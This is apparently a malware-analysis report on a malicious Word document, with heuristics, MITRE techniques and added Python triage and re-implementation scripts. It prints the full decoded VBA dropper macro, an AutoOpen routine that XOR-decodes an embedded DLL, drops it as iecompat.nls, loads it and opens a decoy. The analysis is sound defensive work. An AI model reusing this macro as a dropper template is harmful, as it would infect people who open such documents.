Verdict: MALICIOUS
Risk Score: 378
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.005 Visual Basic
The sample is a malicious Microsoft Word (OLE) document. Its file structure matches the MS07-060 malformed-string exploit shape, which is why the CVE-2007-3899 memory-corruption heuristic fires; that is a structural match rated "likely" by the rule, not confirmed exploitation. The deterministic behaviour comes from the recovered VBA project. An AutoOpen macro, which runs as soon as the document is opened with macros enabled, reads hex-encoded blobs out of the captions of three labels on UserForm1, XORs every byte with 0x5F, and writes them to disk: a DLL chosen by #If Win64 (97,280 bytes from Label2 on 64-bit Office, 86,528 bytes from Label3 on 32-bit) is dropped as iecompat.nls under %UserProfile%\AppData\Local\Microsoft\Internet Explorer\IECompatData (descending into \Modules subdirectories, created with CreateDirectoryA, if that name is already taken), loaded with LoadLibraryA, and its export Bpoint is called with the path of the open document; then a decoy document (83,662 bytes from Label1) is written next to the original under a name ending in " .doc" (a space before the extension), the decoy is opened and the original is closed without saving. The macro source is not obfuscated beyond that hex/XOR packing. The CreateProcess, VirtualAlloc, WriteProcessMemory, CreateRemoteThread and GetProcAddress hits listed under Heuristics are string-level matches on the sample; the recovered VBA source declares only LoadLibraryA, CreateDirectoryA, GetFileAttributesA and the Bpoint import from the dropped DLL, so those names did not come from the macro text, and the dropped DLL is the component to analyse next.
Heuristics (12)

- CVE-2007-3899: Microsoft Word malformed string memory corruption (critical, CVE_2007_3899, likely). Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
- Reference to WriteProcessMemory API (critical, SC_STR_WRITEPROCESSMEMORY)
- Reference to CreateRemoteThread API (critical, SC_STR_CREATEREMOTETHREAD)
- Reference to CreateProcess API (high, SC_STR_CREATEPROCESS)
- Reference to LoadLibrary API (high, SC_STR_LOADLIBRARY)
- Reference to GetProcAddress API (high, SC_STR_GETPROCADDRESS)
- Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that the "no modern VBA project was recovered" clause is the rule's generic text and is contradicted for this sample by the OLE_VBA_MACROS finding and the decoded macros.bas artifact below.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings). Document contains VBA macro code.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched lines in script: `workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\Internet Explorer\IECompatData"` and `dllPath = workDir & "\iecompat.nls"`
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All four URLs below were found in the document text (OLE body) and are OOXML/DrawingML XML namespace identifiers; they are not contacted at runtime and should not be treated as network indicators.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  - http://schemas.microsoft.com/office/2006/coverPageProps (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
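To reconcile the SC_STR_* findings above with what the macro itself contains, the following added example (my code, not the analyzer's) runs a static triage over an excerpt copied from the macros.bas listing later in this report: it lists the Declare imports, flags any that bind to something other than a well-known system library, checks which of the flagged API names occur in the macro text at all, and recovers the XOR key of the hex-string unpacking loop. KNOWN_SYSTEM_LIBS is an assumed allowlist used only for the "odd import" check.

```python
"""Static triage of decoded VBA: declared imports, flagged API names, unpack loop.

Added example, not the analyzer's code. MACRO_EXCERPT is copied from the
macros.bas listing in this report (Declare block, decode loop, AutoOpen);
FLAGGED_APIS are the names the SC_STR_* heuristics fired on.
"""
import re

MACRO_EXCERPT = r'''
Private Declare PtrSafe Function Bpoint Lib "iecompat.nls" (ByVal lpCurPath As String, ByVal lpTmpPath As String, ByVal lpObjType As String) As Long
Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As LongPtr
Private Declare PtrSafe Function CreateDirectoryA Lib "kernel32" (ByVal lpPathName As String, lpSecurityAttributes As Any) As Long
Private Declare PtrSafe Function GetFileAttributesA Lib "kernel32" (ByVal lpFileName As String) As Long
For idx = 0 To nDllSize - 2
dllBin(idx) = CByte("&H" + Mid(DllData, idx * 2 + 1, 2))
dllBin(idx) = dllBin(idx) Xor 95
Next idx
Open dllPath For Binary Lock Write As #1
Sub AutoOpen()
dllPath = GetDllName()
LoadLibraryA (dllPath)
Result = Bpoint(ActiveDocument.Path & "\" & ActiveDocument.Name, "0", "0")
End Sub
'''

FLAGGED_APIS = ["CreateProcess", "VirtualAlloc", "WriteProcessMemory",
                "CreateRemoteThread", "LoadLibrary", "GetProcAddress"]

# Assumed allowlist of bare library names that VBA Declare statements commonly bind to.
KNOWN_SYSTEM_LIBS = {"kernel32", "user32", "advapi32", "shell32", "ole32",
                     "oleaut32", "ntdll", "wininet", "urlmon", "msvcrt"}

DECLARE_RE = re.compile(
    r'^\s*(?:(?:Private|Public)\s+)?Declare\s+(?:PtrSafe\s+)?'
    r'(?:Function|Sub)\s+(?P<name>\w+)\s+Lib\s+"(?P<lib>[^"]+)"',
    re.IGNORECASE | re.MULTILINE)
# CByte("&H" + Mid(...)) followed (possibly on a later line) by "Xor <constant>".
HEX_XOR_RE = re.compile(r'CByte\("&H"\s*\+\s*Mid\(.*?\)\)[\s\S]*?\bXor\s+(\d+)',
                        re.IGNORECASE)


def declared_imports(vba):
    """(function name, library) for every Declare statement in the source."""
    return [(m["name"], m["lib"]) for m in DECLARE_RE.finditer(vba)]


def odd_imports(imports):
    """Declare targets outside the allowlist. A module bound to a data-file
    extension such as .nls, or to a relative name, is the pattern of a macro
    calling into something it dropped itself."""
    odd = []
    for name, lib in imports:
        base = lib.lower().rsplit("\\", 1)[-1]
        if base.endswith(".dll"):
            base = base[:-4]
        if base not in KNOWN_SYSTEM_LIBS:
            odd.append((name, lib))
    return odd


def flagged_apis_in_source(vba, names=FLAGGED_APIS):
    """Whether each flagged API name occurs in the macro text as an identifier
    (prefix match, so LoadLibrary also covers LoadLibraryA)."""
    return {n: re.search(r'\b' + re.escape(n) + r'\w*', vba) is not None for n in names}


def unpack_loop_key(vba):
    """XOR key of a hex-string unpacking loop, or None if no such loop is present."""
    m = HEX_XOR_RE.search(vba)
    return int(m.group(1)) if m else None


def triage(vba):
    imports = declared_imports(vba)
    return {
        "imports": imports,
        "odd_imports": odd_imports(imports),
        "flagged_apis": flagged_apis_in_source(vba),
        "xor_key": unpack_loop_key(vba),
        "autoopen": re.search(r'^\s*Sub\s+AutoOpen\s*\(', vba, re.I | re.M) is not None,
    }


if __name__ == "__main__":
    for key, value in triage(MACRO_EXCERPT).items():
        print(f"{key}: {value}")
```

On this excerpt the only odd import is Bpoint from iecompat.nls, the only flagged name present is LoadLibrary (as LoadLibraryA), and the unpack key is 95 (0x5F); the remaining SC_STR_* names are absent from the macro source, which is the point the summary needs to get right.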
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11094 bytes | 3ce08eb2c55257cd764506334d67e58faec99105862cb1d4f31e878782cbd25a |
Preview script (first 1,000 lines of the extracted script). The listing is the decompressed source of the three module streams (ThisDocument, NewMacros, UserForm1) followed, as ' comment lines, by the p-code disassembly of the same streams. Read the p-code part with care: its identifier names do not line up with the source (the disassembly labels the first Declare `Function Label6_Click(ByVal Bpoint As String)`, the document decode routine `Sub LoadLibraryA(ExtractDoc)`, and calls a function named `iecompat.nls`), so either the disassembler resolved names against the wrong identifier table or the source text and the compiled p-code diverge. Since Word runs the p-code rather than the source text when the saving Office version matches, a source-versus-p-code comparison (the usual VBA stomping check) belongs in the analysis before the source below is treated as exactly what executes.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Private Declare PtrSafe Function Bpoint Lib "iecompat.nls" (ByVal lpCurPath As String, ByVal lpTmpPath As String, ByVal lpObjType As String) As Long
Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As LongPtr
Private Declare PtrSafe Function CreateDirectoryA Lib "kernel32" (ByVal lpPathName As String, lpSecurityAttributes As Any) As Long
Private Declare PtrSafe Function GetFileAttributesA Lib "kernel32" (ByVal lpFileName As String) As Long
Private Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As LongPtr
bInheritHandle As Long
End Type
Function MkDir(szDir)
Dim lpSecurityAttributes As SECURITY_ATTRIBUTES
Dim dwRet
dwRet = CreateDirectoryA(szDir, lpSecurityAttributes)
End Function
Sub ExtractDll(dllPath)
#If Win64 Then
DllData = UserForm1.Label2.Caption
Dim dllBin(97279) As Byte
nDllSize = 97280
#Else
DllData = UserForm1.Label3.Caption
Dim dllBin(86527) As Byte
nDllSize = 86528
#End If
For idx = 0 To nDllSize - 2
dllBin(idx) = CByte("&H" + Mid(DllData, idx * 2 + 1, 2))
dllBin(idx) = dllBin(idx) Xor 95
Next idx
Open dllPath For Binary Lock Write As #1
Put #1, 1, dllBin
Close #1
End Sub
Sub ExtractDoc(docPath)
docData = UserForm1.Label1.Caption
Dim docBin(83661) As Byte
nDocSize = 83662
For idx = 0 To nDocSize - 2
docBin(idx) = CByte("&H" + Mid(docData, idx * 2 + 1, 2))
docBin(idx) = docBin(idx) Xor 95
Next
Open docPath For Binary Lock Write As #2
Put #2, 1, docBin
Close #2
End Sub
Function GetDocName() As String
Dim bFileOk As Boolean
curDocNameFull = ActiveDocument.Path & "\" & ActiveDocument.Name
curDocName = Left(curDocNameFull, InStrRev(curDocNameFull, ".") - 1)
newDocNameFull = curDocName & " .doc"
bFileOk = FileExist(newDocNameFull)
Do While bFileOk = True
curDocName = curDocName & " "
newDocNameFull = curDocName & " .doc"
bFileOk = FileExist(newDocNameFull)
Loop
GetDocName = newDocNameFull
End Function
Function FileExist(szFile) As Boolean
Dim dwRet
dwRet = GetFileAttributesA(szFile)
If dwRet <> -1 Then
FileExist = True
Else
FileExist = False
End If
End Function
Function GetDllName() As String
Dim bFileOk As Boolean
Dim dllPath As String
workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\Internet Explorer\IECompatData"
dllPath = workDir & "\iecompat.nls"
nIdx = 0
bFileOk = FileExist(dllPath)
Do While bFileOk = True
workDir = workDir & "\Modules"
MkDir (workDir)
dllPath = workDir & "\iecompat.nls"
bFileOk = FileExist(dllPath)
Loop
GetDllName = dllPath
End Function
Sub AutoOpen()
dllPath = GetDllName()
docPath = GetDocName()
ExtractDll (dllPath)
ExtractDoc (docPath)
LoadLibraryA (dllPath)
Result = Bpoint(ActiveDocument.Path & "\" & ActiveDocument.Name, "0", "0")
Documents.Open docPath
ThisDocument.Close (wdDoNotSaveChanges)
CLEAN_UP:
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{949BC447-8829-43B3-BC65-3944C1E53928}{4880CDFB-FD9A-41F2-8BCC-55F0F3B7A9E7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label6_Click()
End Sub
' Processing file: /tmp/qstore_6mz3ekcn
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1370 bytes
' Macros/VBA/NewMacros - 36645 bytes
' Line #0:
' FuncDefn (Function Label6_Click(ByVal Bpoint As String) As Long)
' Line #1:
' FuncDefn (Function iecompat.nls(ByVal lpLibFileName As String) As Ptr)
' Line #2:
' FuncDefn (Function CreateDirectoryA(ByVal lpPathName As String) As Long)
' Line #3:
' FuncDefn (Function GetFileAttributesA(ByVal lpFileName As String) As Long)
' Line #4:
' Type (Private) SECURITY_ATTRIBUTES
' Line #5:
' DimImplicit
' VarDefn nLength (As Long)
' Line #6:
' DimImplicit
' VarDefn lpSecurityDescriptor (As Ptr)
' Line #7:
' DimImplicit
' VarDefn bInheritHandle (As Long)
' Line #8:
' EndType
' Line #9:
' FuncDefn (Function MkDir(szDir))
' Line #10:
' Dim
' VarDefn lpSecurityAttributes
' Line #11:
' Dim
' VarDefn dwRet
' Line #12:
' Ld szDir
' Ld lpSecurityAttributes
' ArgsLd CreateDirectoryA 0x0002
' St dwRet
' Line #13:
' EndFunc
' Line #14:
' FuncDefn (Sub ExtractDll(dllPath))
' Line #15:
' LbMark
' Ld Win64
' LbIf
' Line #16:
' Ld UserForm1
' MemLd Label2
' MemLd Caption
' St DllData
' Line #17:
' Dim
' OptionBase
' LitDI4 0x7BFF 0x0001
' VarDefn dllBin
' Line #18:
' LitDI4 0x7C00 0x0001
' St nDllSize
' Line #19:
' LbMark
' LbElse
' Line #20:
' Ld UserForm1
' MemLd Label3
' MemLd Caption
' St DllData
' Line #21:
' Dim
' OptionBase
' LitDI4 0x51FF 0x0001
' VarDefn dllBin
' Line #22:
' LitDI4 0x5200 0x0001
' St nDllSize
' Line #23:
' LbMark
' LbEndIf
' Line #24:
' Line #25:
' StartForVariable
' Ld MSForms
' EndForVariable
' LitDI2 0x0000
' Ld nDllSize
' LitDI2 0x0002
' Sub
' For
' Line #26:
' LitStr 0x0002 "&H"
' Ld DllData
' Ld MSForms
' LitDI2 0x0002
' Mul
' LitDI2 0x0001
' Add
' LitDI2 0x0002
' ArgsLd Mid 0x0003
' Add
' Coerce (Byte)
' Ld MSForms
' ArgsSt dllBin 0x0001
' Line #27:
' Ld MSForms
' ArgsLd dllBin 0x0001
' LitDI2 0x005F
' Xor
' Ld MSForms
' ArgsSt dllBin 0x0001
' Line #28:
' StartForVariable
' Ld MSForms
' EndForVariable
' NextVar
' Line #29:
' Line #30:
' Ld dllPath
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Binary Lock Write)
' Line #31:
' LitDI2 0x0001
' Sharp
' LitDI2 0x0001
' Ld dllBin
' PutRec
' Line #32:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #33:
' EndSub
' Line #34:
' FuncDefn (Sub LoadLibraryA(ExtractDoc))
' Line #35:
' Ld UserForm1
' MemLd docData
' MemLd Caption
' St ExtractDocx
' Line #36:
' Dim
' OptionBase
' LitDI4 0x46CD 0x0001
' VarDefn Label1
' Line #37:
' LitDI4 0x46CE 0x0001
' St docBin
' Line #38:
' Line #39:
' StartForVariable
' Ld MSForms
' EndForVariable
' LitDI2 0x0000
' Ld docBin
' LitDI2 0x0002
' Sub
' For
' Line #40:
' LitStr 0x0002 "&H"
' Ld ExtractDocx
' Ld MSForms
' LitDI2 0x0002
' Mul
' LitDI2 0x0001
' Add
' LitDI2 0x0002
' ArgsLd Mid 0x0003
' Add
' Coerce (Byte)
' Ld MSForms
' ArgsSt Label1 0x0001
' Line #41:
' Ld MSForms
' ArgsLd Label1 0x0001
' LitDI2 0x005F
' Xor
' Ld MSForms
' ArgsSt Label1 0x0001
' Line #42:
' StartForVariable
' Next
' Line #43:
' Line #44:
' Ld ExtractDoc
' LitDI2 0x0002
' Sharp
' LitDefault
' Open (For Binary Lock Write)
' Line #45:
' LitDI2 0x0002
' Sharp
' LitDI2 0x0001
' Ld Label1
' PutRec
' Line #46:
' LitDI2 0x0002
' Sharp
' Close 0x0001
' Line #47:
' EndSub
' Line #48:
' FuncDefn (Function docPath() As String)
' Line #49:
' Dim
' VarDefn bFileOk (As Boolean)
' Line #50:
' Line #51:
' Ld curDocNameFull
' MemLd Environ
' LitStr 0x0001 "\"
' Concat
' Ld curDocNameFull
' MemLd Name
' Concat
' St docxPath
' Line #52:
' Ld docxPath
' Ld docxPath
' LitStr 0x0001 "."
' ArgsLd curDocName 0x0002
' LitDI2 0x0001
' Sub
' ArgsLd Left 0x0002
' St ActiveDocument
' Line #53:
' Ld ActiveDocument
' LitStr 0x0005 " .doc"
' Concat
' St GetDocName
' Line #54:
' Line #55:
' Ld GetDocName
' ArgsLd FileExist 0x0001
' St bFileOk
' Line #56:
' Ld bFileOk
' LitVarSpecial (True)
' Eq
' DoWhile
' Line #57:
' Ld ActiveDocument
' LitStr 0x0001 " "
' Concat
' St ActiveDocument
' Line #58:
' Ld ActiveDocument
' LitStr 0x0005 " .doc"
' Concat
' St GetDocName
' Line #59:
' Ld GetDocName
' ArgsLd FileExist 0x0001
' St bFileOk
' Line #60:
' Loop
' Line #61:
' Line #62:
' Ld GetDocName
' St docPath
' Line #63:
' EndFunc
' Line #64:
' FuncDefn (Function FileExist(szFile) As Boolean)
' Line #65:
' Dim
' VarDefn dwRet
' Line #66:
' Ld szFile
' ArgsLd GetFileAttributesA 0x0001
' St dwRet
' Line #67:
' Ld dwRet
' LitDI2 0x0001
' UMi
' Ne
' IfBlock
' Line #68:
' LitVarSpecial (True)
' St FileExist
' Line #69:
' ElseBlock
' Line #70:
' LitVarSpecial (False)
' St FileExist
' Line #71:
' EndIfBlock
' Line #72:
' EndFunc
' Line #73:
' FuncDefn (Function GetDllName() As String)
' Line #74:
' Dim
' VarDefn bFileOk (As Boolean)
' Line #75:
' Dim
' VarDefn dllPath (As String)
' Line #76:
' Line #77:
' LitStr 0x000B "UserProfile"
' ArgsLd workDir 0x0001
' LitStr 0x0037 "\AppData\Local\Microsoft\Internet Explorer\IECompatData"
' Concat
' St workDir
' Line #78:
' Ld workDir
' LitStr 0x000D "\iecompat.nls"
' Concat
' St dllPath
' Line #79:
' Line #80:
' LitDI2 0x0000
' St nIdx
' Line #81:
' Ld dllPath
' ArgsLd FileExist 0x0001
' St bFileOk
' Line #82:
' Ld bFileOk
' LitVarSpecial (True)
' Eq
' DoWhile
' Line #83:
' Ld workDir
' LitStr 0x0008 "\Modules"
' Concat
' St workDir
' Line #84:
' Ld workDir
' Paren
' ArgsCall MkDir 0x0001
' Line #85:
' Ld workDir
' LitStr 0x000D "\iecompat.nls"
' Concat
' St dllPath
' Line #86:
' Ld dllPath
' ArgsLd FileExist 0x0001
' St bFileOk
' Line #87:
' Loop
' Line #88:
' Line #89:
' Ld dllPath
' St GetDllName
' Line #90:
' EndFunc
' Line #91:
' FuncDefn (Sub AutoOpen())
' Line #92:
' Line #93:
' ArgsLd GetDllName 0x0000
' St dllPath
' Line #94:
' ArgsLd docPath 0x0000
' St ExtractDoc
' Line #95:
' Line #96:
' Ld dllPath
' Paren
' ArgsCall ExtractDll 0x0001
' Line #97:
' Ld ExtractDoc
' Paren
' ArgsCall LoadLibraryA 0x0001
' Line #98:
' Line #99:
' Ld dllPath
' Paren
' ArgsCall iecompat.nls 0x0001
' Line #100:
' Line #101:
' Ld curDocNameFull
' MemLd Environ
' LitStr 0x0001 "\"
' Concat
' Ld curDocNameFull
' MemLd Name
' Concat
' LitStr 0x0001 "0"
' LitStr 0x0001 "0"
' ArgsLd Label6_Click 0x0003
' St newDocNameFull
' Line #102:
' Line #103:
' Ld ExtractDoc
' Ld _B_var_Open
' ArgsMemCall Open 0x0001
' Line #104:
' Ld Documents
' Paren
' Ld ThisDocument
' ArgsMemCall Close 0x0001
' Line #105:
' Line #106:
' Label AppPath
' Line #107:
' Line #108:
' EndSub
' Line #109:
' Line #110:
' Macros/VBA/UserForm1 - 1881 bytes
' Line #0:
' FuncDefn (Sub Label6())
' Line #1:
' Line #2:
' EndSub
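The drop logic of the NewMacros module, re-implemented as an added example (my code, not the analyzer's and not the sample's) so the artifacts can be predicted offline: the hex/XOR decode as the macro performs it, including its off-by-one that leaves the last byte of every dropped file as 0x00, and the two path-selection loops that decide where iecompat.nls and the decoy document land. The real payloads sit in the UserForm1 label captions, which this page does not reproduce, so CONSTRUCTED_PAYLOAD is a fake blob built here; the key, sizes and paths are taken from the macro source.

```python
"""Re-implementation of the NewMacros drop logic for offline analysis.

Added example, not the analyzer's code and not the sample's code. The real
payloads live in the captions of UserForm1.Label1/2/3 and are not on this
page; CONSTRUCTED_PAYLOAD below is a fake blob made here for illustration.
"""
import hashlib

XOR_KEY = 0x5F          # the macro's `Xor 95`
DLL_SIZE_WIN64 = 97280  # nDllSize under #If Win64 (UserForm1.Label2)
DLL_SIZE_WIN32 = 86528  # nDllSize otherwise      (UserForm1.Label3)
DOC_SIZE = 83662        # nDocSize, decoy document (UserForm1.Label1)


def decode_caption(caption: str, n_bytes: int) -> bytes:
    """Mirror ExtractDll/ExtractDoc: hex pairs -> bytes, then XOR 0x5F.

    The VBA loop is `For idx = 0 To nDllSize - 2`, so only n_bytes - 1 bytes
    are decoded and the final element of the Byte array is written to disk
    as 0x00. The quirk is kept because it changes the dropped file's hash.
    """
    out = bytearray(n_bytes)
    for idx in range(n_bytes - 1):
        pair = caption[idx * 2:idx * 2 + 2]   # Mid(data, idx*2+1, 2) is 1-based
        out[idx] = int(pair, 16) ^ XOR_KEY    # CByte("&H" + pair) Xor 95
    return bytes(out)


def encode_caption(data: bytes) -> str:
    """Inverse transform; only used here to build the constructed sample input."""
    return "".join(f"{b ^ XOR_KEY:02X}" for b in data)


def predict_dll_path(user_profile: str, exists) -> str:
    """Mirror GetDllName: if iecompat.nls already exists, keep descending into a
    new \\Modules subdirectory (created by the macro via CreateDirectoryA) until
    a free path is found. `exists` stands in for GetFileAttributesA."""
    work_dir = user_profile + r"\AppData\Local\Microsoft\Internet Explorer\IECompatData"
    dll_path = work_dir + r"\iecompat.nls"
    while exists(dll_path):
        work_dir += r"\Modules"
        dll_path = work_dir + r"\iecompat.nls"
    return dll_path


def predict_decoy_path(doc_full_path: str, exists) -> str:
    """Mirror GetDocName: cut at the last '.', append ' .doc', and keep adding
    spaces before ' .doc' until the name is unused. The decoy always carries at
    least one space before its extension, a cheap hunting indicator."""
    dot = doc_full_path.rfind(".")
    stem = doc_full_path[:dot] if dot >= 0 else doc_full_path  # VBA would error without a '.'
    candidate = stem + " .doc"
    while exists(candidate):
        stem += " "
        candidate = stem + " .doc"
    return candidate


# Constructed stand-in for a dropped DLL: a PE-looking header plus filler bytes.
CONSTRUCTED_PAYLOAD = b"MZ\x90\x00" + bytes(range(28))
CONSTRUCTED_CAPTION = encode_caption(CONSTRUCTED_PAYLOAD)


def analyse(caption: str, n_bytes: int, user_profile: str, doc_path: str,
            exists=lambda p: False) -> dict:
    """Decode a caption the way the macro does and report what would land on disk."""
    dropped = decode_caption(caption, n_bytes)
    return {
        "is_pe": dropped[:2] == b"MZ",
        "sha256": hashlib.sha256(dropped).hexdigest(),
        "last_byte_zero": dropped[-1] == 0,
        "dll_path": predict_dll_path(user_profile, exists),
        "decoy_path": predict_decoy_path(doc_path, exists),
    }


if __name__ == "__main__":
    print(analyse(CONSTRUCTED_CAPTION, len(CONSTRUCTED_PAYLOAD),
                  r"C:\Users\victim", r"C:\Users\victim\Desktop\invoice.doc"))
```

To use this against the real sample, dump the UserForm1 label captions (olevba's form-string extraction, or the MS-OFORMS "o" stream of the UserForm1 storage), feed Label2's caption with DLL_SIZE_WIN64 or Label3's with DLL_SIZE_WIN32 to decode_caption, and hash the result; the hash of the file that actually lands on disk includes the trailing 0x00 byte, so compare against that value rather than against the hash of the cleanly decoded blob.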